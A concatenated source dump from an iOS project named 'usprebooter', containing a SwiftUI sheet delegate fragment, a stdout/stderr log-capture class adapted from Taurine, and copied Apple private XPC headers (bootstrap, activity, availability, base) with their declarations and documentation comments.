UISheetPresentationController) { guard let selection = selection, let id = sheetPresentationController.selectedDetentIdentifier?.rawValue, selection.wrappedValue.id.rawValue != id else { return } selection.wrappedValue = .init(id: .init(rawValue: id)) } override func responds(to aSelector: Selector!) -> Bool { if super.responds(to: aSelector) { return true } if _delegate?.responds(to: aSelector) ?? false { return true } return false } override func forwardingTarget(for aSelector: Selector!) -> Any? { if super.responds(to: aSelector) { return self } return _delegate } } } #endif ================================================ FILE: usprebooter/Info.plist ================================================ UIApplicationSceneManifest UIApplicationSupportsMultipleScenes ================================================ FILE: usprebooter/Log.swift ================================================ // // Log.swift // BootstrapUI // // Created by haxi0 on 28.12.2023. // import Foundation import UIKit import SwiftUI //From https://github.com/Odyssey-Team/Taurine/blob/main/Taurine/app/LogStream.swift //Code from Taurine https://github.com/Odyssey-Team/Taurine under BSD 4 License class LogStream { static let shared = LogStream() private(set) var outputString: NSMutableAttributedString = NSMutableAttributedString() public let reloadNotification = Notification.Name("LogStreamReloadNotification") private(set) var outputFd: [Int32] = [0, 0] private(set) var errFd: [Int32] = [0, 0] private let readQueue: DispatchQueue private let outputSource: DispatchSourceRead private let errorSource: DispatchSourceRead init() { readQueue = DispatchQueue(label: "com.roothide.Bootstrap.logstream", qos: .userInteractive, attributes: .concurrent, autoreleaseFrequency: .inherit, target: nil) guard pipe(&outputFd) != -1, pipe(&errFd) != -1 else { fatalError("pipe failed") } let origOutput = dup(STDOUT_FILENO) let origErr = dup(STDERR_FILENO) setvbuf(stdout, nil, _IONBF, 0) guard dup2(outputFd[1], STDOUT_FILENO) >= 0, dup2(errFd[1], STDERR_FILENO) >= 0 else { fatalError("dup2 failed") } outputSource = DispatchSource.makeReadSource(fileDescriptor: outputFd[0], queue: readQueue) errorSource = DispatchSource.makeReadSource(fileDescriptor: errFd[0], queue: readQueue) outputSource.setCancelHandler { close(self.outputFd[0]) close(self.outputFd[1]) } errorSource.setCancelHandler { close(self.errFd[0]) close(self.errFd[1]) } let bufsiz = Int(BUFSIZ) outputSource.setEventHandler { let buffer = UnsafeMutablePointer.allocate(capacity: bufsiz) defer { buffer.deallocate() } let bytesRead = read(self.outputFd[0], buffer, bufsiz) guard bytesRead > 0 else { if bytesRead == -1 && errno == EAGAIN { return } self.outputSource.cancel() return } write(origOutput, buffer, bytesRead) let array = Array(UnsafeBufferPointer(start: buffer, count: bytesRead)) + [UInt8(0)] array.withUnsafeBufferPointer { ptr in let str = String(cString: unsafeBitCast(ptr.baseAddress, to: UnsafePointer.self)) let textColor = UIColor.white let substring = NSMutableAttributedString(string: str, attributes: [NSAttributedString.Key.foregroundColor: textColor]) self.outputString.append(substring) DispatchQueue.main.async { NotificationCenter.default.post(name: self.reloadNotification, object: nil) } } } errorSource.setEventHandler { let buffer = UnsafeMutablePointer.allocate(capacity: bufsiz) defer { buffer.deallocate() } let bytesRead = read(self.errFd[0], buffer, bufsiz) guard bytesRead > 0 else { if bytesRead == -1 && errno == EAGAIN { return } self.errorSource.cancel() return } write(origErr, buffer, bytesRead) let array = Array(UnsafeBufferPointer(start: buffer, count: bytesRead)) + [UInt8(0)] array.withUnsafeBufferPointer { ptr in let str = String(cString: unsafeBitCast(ptr.baseAddress, to: UnsafePointer.self)) let textColor = UIColor(red: 219/255.0, green: 44.0/255.0, blue: 56.0/255.0, alpha: 1) let substring = NSMutableAttributedString(string: str, attributes: [NSAttributedString.Key.foregroundColor: textColor]) self.outputString.append(substring) DispatchQueue.main.async { NotificationCenter.default.post(name: self.reloadNotification, object: nil) } } } outputSource.resume() errorSource.resume() } } ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/bootstrap.h ================================================ #ifndef __XPC_BOOTSTRAP_H__ #define __XPC_BOOTSTRAP_H__ #ifndef __XPC_INDIRECT__ #define __XPC_INDIRECT__ #endif // __XPC_INDIRECT__ #include "base.h" #include // #include __BEGIN_DECLS; #include #include #include #include #define BOOTSTRAP_MAX_NAME_LEN 128 #define BOOTSTRAP_MAX_CMD_LEN 512 typedef char name_t[BOOTSTRAP_MAX_NAME_LEN]; typedef char cmd_t[BOOTSTRAP_MAX_CMD_LEN]; typedef name_t *name_array_t; typedef int bootstrap_status_t; typedef bootstrap_status_t *bootstrap_status_array_t; typedef unsigned int bootstrap_property_t; typedef bootstrap_property_t * bootstrap_property_array_t; typedef boolean_t *bool_array_t; #define BOOTSTRAP_MAX_LOOKUP_COUNT 20 #define BOOTSTRAP_SUCCESS 0 #define BOOTSTRAP_NOT_PRIVILEGED 1100 #define BOOTSTRAP_NAME_IN_USE 1101 #define BOOTSTRAP_UNKNOWN_SERVICE 1102 #define BOOTSTRAP_SERVICE_ACTIVE 1103 #define BOOTSTRAP_BAD_COUNT 1104 #define BOOTSTRAP_NO_MEMORY 1105 #define BOOTSTRAP_NO_CHILDREN 1106 #define BOOTSTRAP_STATUS_INACTIVE 0 #define BOOTSTRAP_STATUS_ACTIVE 1 #define BOOTSTRAP_STATUS_ON_DEMAND 2 XPC_EXPORT mach_port_t bootstrap_port; __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL5 kern_return_t bootstrap_create_server(mach_port_t bp, cmd_t server_cmd, uid_t server_uid, boolean_t on_demand, mach_port_t *server_port); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL3 kern_return_t bootstrap_subset(mach_port_t bp, mach_port_t requestor_port, mach_port_t *subset_port); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_5, __IPHONE_2_0, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL2 kern_return_t bootstrap_unprivileged(mach_port_t bp, mach_port_t *unpriv_port); __OSX_AVAILABLE_STARTING(__MAC_10_4, __IPHONE_2_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL2 kern_return_t bootstrap_parent(mach_port_t bp, mach_port_t *parent_port); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_5, __IPHONE_2_0, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT kern_return_t bootstrap_register(mach_port_t bp, name_t service_name, mach_port_t sp); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_6, __IPHONE_2_0, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL3 kern_return_t bootstrap_create_service(mach_port_t bp, name_t service_name, mach_port_t *sp); __OSX_AVAILABLE_STARTING(__MAC_10_4, __IPHONE_2_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL3 kern_return_t bootstrap_check_in(mach_port_t bp, const name_t service_name, mach_port_t *sp); // Once is fixed, we can add back in XPC_WARN_RESULT. __OSX_AVAILABLE_STARTING(__MAC_10_4, __IPHONE_2_0) XPC_EXPORT XPC_NONNULL3 kern_return_t bootstrap_look_up(mach_port_t bp, const name_t service_name, mach_port_t *sp); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_5, __IPHONE_2_0, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL2 kern_return_t bootstrap_status(mach_port_t bp, name_t service_name, bootstrap_status_t *service_active); __OSX_AVAILABLE_STARTING(__MAC_10_4, __IPHONE_2_0) XPC_EXPORT XPC_WARN_RESULT const char * bootstrap_strerror(kern_return_t r); __END_DECLS; #endif // __XPC_BOOTSTRAP_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/activity.h ================================================ #ifndef __XPC_ACTIVITY_H__ #define __XPC_ACTIVITY_H__ #ifndef __XPC_INDIRECT__ #error "Please #include instead of this file directly." // For HeaderDoc. #include "base.h" #endif // __XPC_INDIRECT__ #ifdef __BLOCKS__ XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS /* * The following are a collection of keys and values used to set an activity's * execution criteria. */ /*! * @constant XPC_ACTIVITY_INTERVAL * An integer property indicating the desired time interval (in seconds) of the * activity. The activity will not be run more than once per time interval. * Due to the nature of XPC Activity finding an opportune time to run * the activity, any two occurrences may be more or less than 'interval' * seconds apart, but on average will be 'interval' seconds apart. * The presence of this key implies the following, unless overridden: * - XPC_ACTIVITY_REPEATING with a value of true * - XPC_ACTIVITY_DELAY with a value of half the 'interval' * The delay enforces a minimum distance between any two occurrences. * - XPC_ACTIVITY_GRACE_PERIOD with a value of half the 'interval'. * The grace period is the amount of time allowed to pass after the end of * the interval before more aggressive scheduling occurs. The grace period * does not increase the size of the interval. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_INTERVAL; /*! * @constant XPC_ACTIVITY_REPEATING * A boolean property indicating whether this is a repeating activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_REPEATING; /*! * @constant XPC_ACTIVITY_DELAY * An integer property indicating the number of seconds to delay before * beginning the activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_DELAY; /*! * @constant XPC_ACTIVITY_GRACE_PERIOD * An integer property indicating the number of seconds to allow as a grace * period before the scheduling of the activity becomes more aggressive. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_GRACE_PERIOD; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_1_MIN; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_5_MIN; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_15_MIN; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_30_MIN; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_1_HOUR; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_4_HOURS; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_8_HOURS; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_1_DAY; __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const int64_t XPC_ACTIVITY_INTERVAL_7_DAYS; /*! * @constant XPC_ACTIVITY_PRIORITY * A string property indicating the priority of the activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_PRIORITY; /*! * @constant XPC_ACTIVITY_PRIORITY_MAINTENANCE * A string indicating activity is maintenance priority. * * Maintenance priority is intended for user-invisible maintenance tasks * such as garbage collection or optimization. * * Maintenance activities are not permitted to run if the device thermal * condition exceeds a nominal level or if the battery level is lower than 20%. * In Low Power Mode (on supported devices), maintenance activities are not * permitted to run while the device is on battery, or plugged in and the * battery level is lower than 30%. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_PRIORITY_MAINTENANCE; /*! * @constant XPC_ACTIVITY_PRIORITY_UTILITY * A string indicating activity is utility priority. * * Utility priority is intended for user-visible tasks such as fetching data * from the network, copying files, or importing data. * * Utility activities are not permitted to run if the device thermal condition * exceeds a moderate level or if the battery level is less than 10%. In Low * Power Mode (on supported devices) when on battery power, utility activities * are only permitted when they are close to their deadline (90% of their time * window has elapsed). */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_PRIORITY_UTILITY; /*! * @constant XPC_ACTIVITY_ALLOW_BATTERY * A Boolean value indicating whether the activity should be allowed to run * while the computer is on battery power. The default value is false for * maintenance priority activity and true for utility priority activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_ALLOW_BATTERY; /*! * @constant XPC_ACTIVITY_REQUIRE_SCREEN_SLEEP * A Boolean value indicating whether the activity should only be performed * while device appears to be asleep. Note that the definition of screen sleep * may vary by platform and may include states where the device is known to be * idle despite the fact that the display itself is still powered. Defaults to * false. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const char * const XPC_ACTIVITY_REQUIRE_SCREEN_SLEEP; // bool /*! * @constant XPC_ACTIVITY_PREVENT_DEVICE_SLEEP * A Boolean value indicating whether the activity should prevent system sleep while * running on battery. * If this property is set, the activity scheduler will take the appropriate power * assertion to keep the device (but not the screen) awake while the activity is running. * Only activities which perform critical system functions that do not want to be * interrupted by system sleep should set this. * Setting this property can impact battery life. */ __API_AVAILABLE(macos(12.0), ios(15.0), watchos(8.0)) XPC_EXPORT const char * const XPC_ACTIVITY_PREVENT_DEVICE_SLEEP; // bool /*! * @constant XPC_ACTIVITY_REQUIRE_BATTERY_LEVEL * An integer percentage of minimum battery charge required to allow the * activity to run. A default minimum battery level is determined by the * system. */ __OSX_AVAILABLE_BUT_DEPRECATED_MSG(__MAC_10_9, __MAC_10_9, __IPHONE_7_0, __IPHONE_7_0, "REQUIRE_BATTERY_LEVEL is not implemented") XPC_EXPORT const char * const XPC_ACTIVITY_REQUIRE_BATTERY_LEVEL; // int (%) /*! * @constant XPC_ACTIVITY_REQUIRE_HDD_SPINNING * A Boolean value indicating whether the activity should only be performed * while the hard disk drive (HDD) is spinning. Computers with flash storage * are considered to be equivalent to HDD spinning. Defaults to false. */ __OSX_AVAILABLE_BUT_DEPRECATED_MSG(__MAC_10_9, __MAC_10_9, __IPHONE_7_0, __IPHONE_7_0, "REQUIRE_HDD_SPINNING is not implemented") XPC_EXPORT const char * const XPC_ACTIVITY_REQUIRE_HDD_SPINNING; // bool /*! * @define XPC_TYPE_ACTIVITY * A type representing the XPC activity object. */ #define XPC_TYPE_ACTIVITY (&_xpc_type_activity) __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_TYPE(_xpc_type_activity); /*! * @typedef xpc_activity_t * * @abstract * An XPC activity object. * * @discussion * This object represents a set of execution criteria and a current execution * state for background activity on the system. Once an activity is registered, * the system will evaluate its criteria to determine whether the activity is * eligible to run under current system conditions. When an activity becomes * eligible to run, its execution state will be updated and an invocation of * its handler block will be made. */ XPC_DECL(xpc_activity); /*! * @typedef xpc_activity_handler_t * * @abstract * A block that is called when an XPC activity becomes eligible to run. */ XPC_NONNULL1 typedef void (^xpc_activity_handler_t)(xpc_activity_t activity); /*! * @constant XPC_ACTIVITY_CHECK_IN * This constant may be passed to xpc_activity_register() as the criteria * dictionary in order to check in with the system for previously registered * activity using the same identifier (for example, an activity taken from a * launchd property list). */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT const xpc_object_t XPC_ACTIVITY_CHECK_IN; /*! * @function xpc_activity_register * * @abstract * Registers an activity with the system. * * @discussion * Registers a new activity with the system. The criteria of the activity are * described by the dictionary passed to this function. If an activity with the * same identifier already exists, the criteria provided override the existing * criteria unless the special dictionary XPC_ACTIVITY_CHECK_IN is used. The * XPC_ACTIVITY_CHECK_IN dictionary instructs the system to first look up an * existing activity without modifying its criteria. Once the existing activity * is found (or a new one is created with an empty set of criteria) the handler * will be called with an activity object in the XPC_ACTIVITY_STATE_CHECK_IN * state. * * @param identifier * A unique identifier for the activity. Each application has its own namespace. * The identifier should remain constant across registrations, relaunches of * the application, and reboots. It should identify the kind of work being done, * not a particular invocation of the work. * * @param criteria * A dictionary of criteria for the activity. * * @param handler * The handler block to be called when the activity changes state to one of the * following states: * - XPC_ACTIVITY_STATE_CHECK_IN (optional) * - XPC_ACTIVITY_STATE_RUN * * The handler block is never invoked reentrantly. It will be invoked on a * dispatch queue with an appropriate priority to perform the activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_NONNULL3 void xpc_activity_register(const char *identifier, xpc_object_t criteria, xpc_activity_handler_t handler); /*! * @function xpc_activity_copy_criteria * * @abstract * Returns an XPC dictionary describing the execution criteria of an activity. * This will return NULL in cases where the activity has already completed, e.g. * when checking in to an event that finished and was not rescheduled. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_RETURNS_RETAINED XPC_NONNULL1 xpc_object_t _Nullable xpc_activity_copy_criteria(xpc_activity_t activity); /*! * @function xpc_activity_set_criteria * * @abstract * Modifies the execution criteria of an activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_activity_set_criteria(xpc_activity_t activity, xpc_object_t criteria); /*! * @enum xpc_activity_state_t * An activity is defined to be in one of the following states. Applications * may check the current state of the activity using xpc_activity_get_state() * in the handler block provided to xpc_activity_register(). * * The application can modify the state of the activity by calling * xpc_activity_set_state() with one of the following: * - XPC_ACTIVITY_STATE_DEFER * - XPC_ACTIVITY_STATE_CONTINUE * - XPC_ACTIVITY_STATE_DONE * * @constant XPC_ACTIVITY_STATE_CHECK_IN * An activity in this state has just completed a checkin with the system after * XPC_ACTIVITY_CHECK_IN was provided as the criteria dictionary to * xpc_activity_register. The state gives the application an opportunity to * inspect and modify the activity's criteria. * * @constant XPC_ACTIVITY_STATE_WAIT * An activity in this state is waiting for an opportunity to run. This value * is never returned within the activity's handler block, as the block is * invoked in response to XPC_ACTIVITY_STATE_CHECK_IN or XPC_ACTIVITY_STATE_RUN. * * Note: * A launchd job may idle exit while an activity is in the wait state and be * relaunched in response to the activity becoming runnable. The launchd job * simply needs to re-register for the activity on its next launch by passing * XPC_ACTIVITY_STATE_CHECK_IN to xpc_activity_register(). * * @constant XPC_ACTIVITY_STATE_RUN * An activity in this state is eligible to run based on its criteria. * * @constant XPC_ACTIVITY_STATE_DEFER * An application may pass this value to xpc_activity_set_state() to indicate * that the activity should be deferred (placed back into the WAIT state) until * a time when its criteria are met again. Deferring an activity does not reset * any of its time-based criteria (in other words, it will remain past due). * * IMPORTANT: * This should be done in response to observing xpc_activity_should_defer(). * It should not be done unilaterally. If you determine that conditions are bad * to do your activity's work for reasons you can't express in a criteria * dictionary, you should set the activity's state to XPC_ACTIVITY_STATE_DONE. * * * @constant XPC_ACTIVITY_STATE_CONTINUE * An application may pass this value to xpc_activity_set_state() to indicate * that the activity will continue its operation beyond the return of its * handler block. This can be used to extend an activity to include asynchronous * operations. The activity's handler block will not be invoked again until the * state has been updated to either XPC_ACTIVITY_STATE_DEFER or, in the case * of repeating activity, XPC_ACTIVITY_STATE_DONE. * * @constant XPC_ACTIVITY_STATE_DONE * An application may pass this value to xpc_activity_set_state() to indicate * that the activity has completed. For non-repeating activity, the resources * associated with the activity will be automatically released upon return from * the handler block. For repeating activity, timers present in the activity's * criteria will be reset. */ enum { XPC_ACTIVITY_STATE_CHECK_IN, XPC_ACTIVITY_STATE_WAIT, XPC_ACTIVITY_STATE_RUN, XPC_ACTIVITY_STATE_DEFER, XPC_ACTIVITY_STATE_CONTINUE, XPC_ACTIVITY_STATE_DONE, }; typedef long xpc_activity_state_t; /*! * @function xpc_activity_get_state * * @abstract * Returns the current state of an activity. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 xpc_activity_state_t xpc_activity_get_state(xpc_activity_t activity); /*! * @function xpc_activity_set_state * * @abstract * Updates the current state of an activity. * * @return * Returns true if the state was successfully updated; otherwise, returns * false if the requested state transition is not valid. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 bool xpc_activity_set_state(xpc_activity_t activity, xpc_activity_state_t state); /*! * @function xpc_activity_should_defer * * @abstract * Test whether an activity should be deferred. * * @discussion * This function may be used to test whether the criteria of a long-running * activity are still satisfied. If not, the system indicates that the * application should defer the activity. The application may acknowledge the * deferral by calling xpc_activity_set_state() with XPC_ACTIVITY_STATE_DEFER. * Once deferred, the system will place the activity back into the WAIT state * and re-invoke the handler block at the earliest opportunity when the criteria * are once again satisfied. * * @return * Returns true if the activity should be deferred. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 bool xpc_activity_should_defer(xpc_activity_t activity); /*! * @function xpc_activity_unregister * * @abstract * Unregisters an activity found by its identifier. * * @discussion * A dynamically registered activity will be deleted in response to this call. * Statically registered activity (from a launchd property list) will be * deleted until the job is next loaded (e.g. at next boot). * * Unregistering an activity has no effect on any outstanding xpc_activity_t * objects or any currently executing xpc_activity_handler_t blocks; however, * no new handler block invocations will be made after it is unregistered. * * @param identifier * The identifier of the activity to unregister. */ __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0) XPC_EXPORT XPC_NONNULL1 void xpc_activity_unregister(const char *identifier); __END_DECLS XPC_ASSUME_NONNULL_END #endif // __BLOCKS__ #endif // __XPC_ACTIVITY_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/availability.h ================================================ #ifndef __XPC_AVAILABILITY_H__ #define __XPC_AVAILABILITY_H__ #include #include __BEGIN_DECLS // Certain parts of the project use all the project's headers but have to build // against newer OSX SDKs than ebuild uses -- liblaunch_host being the example. // So we need to define these. #ifndef __MAC_10_16 #define __MAC_10_16 101600 #endif // __MAC_10_16 #ifndef __MAC_10_15 #define __MAC_10_15 101500 #define __AVAILABILITY_INTERNAL__MAC_10_15 \ __attribute__((availability(macosx, introduced=10.15))) #endif // __MAC_10_15 #ifndef __MAC_10_14 #define __MAC_10_14 101400 #define __AVAILABILITY_INTERNAL__MAC_10_14 \ __attribute__((availability(macosx, introduced=10.14))) #endif // __MAC_10_14 #ifndef __MAC_10_13 #define __MAC_10_13 101300 #define __AVAILABILITY_INTERNAL__MAC_10_13 \ __attribute__((availability(macosx, introduced=10.13))) #endif // __MAC_10_13 #ifndef __MAC_10_12 #define __MAC_10_12 101200 #define __AVAILABILITY_INTERNAL__MAC_10_12 \ __attribute__((availability(macosx, introduced=10.12))) #endif // __MAC_10_12 #ifndef __MAC_10_11 #define __MAC_10_11 101100 #define __AVAILABILITY_INTERNAL__MAC_10_11 \ __attribute__((availability(macosx, introduced=10.11))) #endif // __MAC_10_11 #ifndef __MAC_12_0 #define __MAC_12_0 120000 #define __AVAILABILITY_INTERNAL__MAC_12_0 \ __attribute__((availability(macosx, introduced=12.0))) #endif // __MAC_12_0 #ifndef __MAC_13_3 #define __MAC_13_3 130300 #endif // __MAC_13_3 #ifndef __AVAILABILITY_INTERNAL__MAC_10_2_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_2_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_2_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_3_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_3_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_3_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_4_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_4_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_4_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_5_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_5_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_5_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_6_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_6_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_6_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_7_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_7_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_7_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_8_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_8_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_8_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_9_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_9_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_9_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_10_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_10_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_10_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_11_DEP__MAC_10_11 #define __AVAILABILITY_INTERNAL__MAC_10_11_DEP__MAC_10_11 #endif // __AVAILABILITY_INTERNAL__MAC_10_11_DEP__MAC_10_11 #ifndef __AVAILABILITY_INTERNAL__MAC_10_6_DEP__MAC_10_13 #define __AVAILABILITY_INTERNAL__MAC_10_6_DEP__MAC_10_13 #endif // __AVAILABILITY_INTERNAL__MAC_10_6_DEP__MAC_10_13 #if __has_include() __END_DECLS #include __BEGIN_DECLS #else // __has_include() #ifndef IPHONE_SIMULATOR_HOST_MIN_VERSION_REQUIRED #define IPHONE_SIMULATOR_HOST_MIN_VERSION_REQUIRED 999999 #endif // IPHONE_SIMULATOR_HOST_MIN_VERSION_REQUIRED #endif // __has_include() #ifndef __WATCHOS_UNAVAILABLE #define __WATCHOS_UNAVAILABLE #endif #ifndef __TVOS_UNAVAILABLE #define __TVOS_UNAVAILABLE #endif // simulator host-side bits build against SDKs not having __*_AVAILABLE() yet #ifndef __OSX_AVAILABLE #define __OSX_AVAILABLE(...) #endif #ifndef __IOS_AVAILABLE #define __IOS_AVAILABLE(...) #endif #ifndef __TVOS_AVAILABLE #define __TVOS_AVAILABLE(...) #endif #ifndef __WATCHOS_AVAILABLE #define __WATCHOS_AVAILABLE(...) #endif #ifndef __API_AVAILABLE #define __API_AVAILABLE(...) #endif __END_DECLS #endif // __XPC_AVAILABILITY_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/base.h ================================================ // Copyright (c) 2009-2011 Apple Inc. All rights reserved. #ifndef __XPC_BASE_H__ #define __XPC_BASE_H__ #include #if !defined(__has_include) #define __has_include(x) 0 #endif // !defined(__has_include) #if !defined(__has_attribute) #define __has_attribute(x) 0 #endif // !defined(__has_attribute) #if !defined(__has_feature) #define __has_feature(x) 0 #endif // !defined(__has_feature) #if !defined(__has_extension) #define __has_extension(x) 0 #endif // !defined(__has_extension) #if __has_include() #include "availability.h" #else // __has_include() #include #endif // __has_include() #include #ifndef __XPC_INDIRECT__ #error "Please #include instead of this file directly." #endif // __XPC_INDIRECT__ __BEGIN_DECLS #pragma mark Attribute Shims #ifdef __GNUC__ #define XPC_CONSTRUCTOR __attribute__((constructor)) #define XPC_NORETURN __attribute__((__noreturn__)) #define XPC_NOTHROW __attribute__((__nothrow__)) #define XPC_NONNULL1 __attribute__((__nonnull__(1))) #define XPC_NONNULL2 __attribute__((__nonnull__(2))) #define XPC_NONNULL3 __attribute__((__nonnull__(3))) #define XPC_NONNULL4 __attribute__((__nonnull__(4))) #define XPC_NONNULL5 __attribute__((__nonnull__(5))) #define XPC_NONNULL6 __attribute__((__nonnull__(6))) #define XPC_NONNULL7 __attribute__((__nonnull__(7))) #define XPC_NONNULL8 __attribute__((__nonnull__(8))) #define XPC_NONNULL9 __attribute__((__nonnull__(9))) #define XPC_NONNULL10 __attribute__((__nonnull__(10))) #define XPC_NONNULL11 __attribute__((__nonnull__(11))) #define XPC_NONNULL_ALL __attribute__((__nonnull__)) #define XPC_SENTINEL __attribute__((__sentinel__)) #define XPC_PURE __attribute__((__pure__)) #define XPC_WARN_RESULT __attribute__((__warn_unused_result__)) #define XPC_MALLOC __attribute__((__malloc__)) #define XPC_UNUSED __attribute__((__unused__)) #define XPC_USED __attribute__((__used__)) #define XPC_PACKED __attribute__((__packed__)) #define XPC_PRINTF(m, n) __attribute__((format(printf, m, n))) #define XPC_INLINE static __inline__ __attribute__((__always_inline__)) #define XPC_NOINLINE __attribute__((noinline)) #define XPC_NOIMPL __attribute__((unavailable)) #if __has_attribute(noescape) #define XPC_NOESCAPE __attribute__((__noescape__)) #else #define XPC_NOESCAPE #endif #if __has_extension(attribute_unavailable_with_message) #define XPC_UNAVAILABLE(m) __attribute__((unavailable(m))) #else // __has_extension(attribute_unavailable_with_message) #define XPC_UNAVAILABLE(m) XPC_NOIMPL #endif // __has_extension(attribute_unavailable_with_message) #define XPC_EXPORT extern __attribute__((visibility("default"))) #define XPC_NOEXPORT __attribute__((visibility("hidden"))) #define XPC_WEAKIMPORT extern __attribute__((weak_import)) #define XPC_DEBUGGER_EXCL XPC_NOEXPORT 